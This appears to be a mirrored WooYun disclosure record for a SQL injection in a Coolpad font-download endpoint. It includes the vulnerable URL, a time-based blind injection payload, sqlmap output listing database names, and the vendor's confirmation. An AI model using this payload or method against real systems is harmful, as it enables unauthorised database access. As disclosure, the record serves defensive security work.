乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-10: 细节已通知厂商并且等待厂商处理中 2015-01-12: 厂商已经确认,细节仅向厂商公开 2015-01-22: 细节向核心白帽子及相关领域专家公开 2015-02-01: 细节向普通白帽子公开 2015-02-11: 细节向实习白帽子公开 2015-02-24: 细节向公众公开
酷派某处注入2
http://coolshow.coolyun.com/service/fontdl.php?channel=0&cpid=2928925714&id=2928925714&type=0cpid参数
sqlmap identified the following injection points with a total of 103 HTTP(s) requests:---Place: GETParameter: cpid Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: channel=0&cpid=2928925714' AND SLEEP(5) AND 'hbrz'='hbrz&id=2928925714&type=0---[20:51:38] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.13back-end DBMS: MySQL 5.0.11
databse
[20:52:11] [INFO] retrieved: information_schema[20:54:06] [INFO] retrieved: db_yl_androidesk[20:55:50] [INFO] retrieved: db_yl_elflockscreen[20:59:17] [INFO] retrieved: db_yl_keyguard[21:01:43] [INFO] retrieved: db_yl_themes[21:04:32] [INFO] retrieved: db_yl_themes_records[21:10:00] [INFO] retrieved: db_yl_widget_image[21:15:30] [INFO] retrieved: db_yl_widget_records。。。
。。
危害等级:高
漏洞Rank:15
确认时间:2015-01-12 15:42
感谢提供,已提交给业务部门紧急处理。
暂无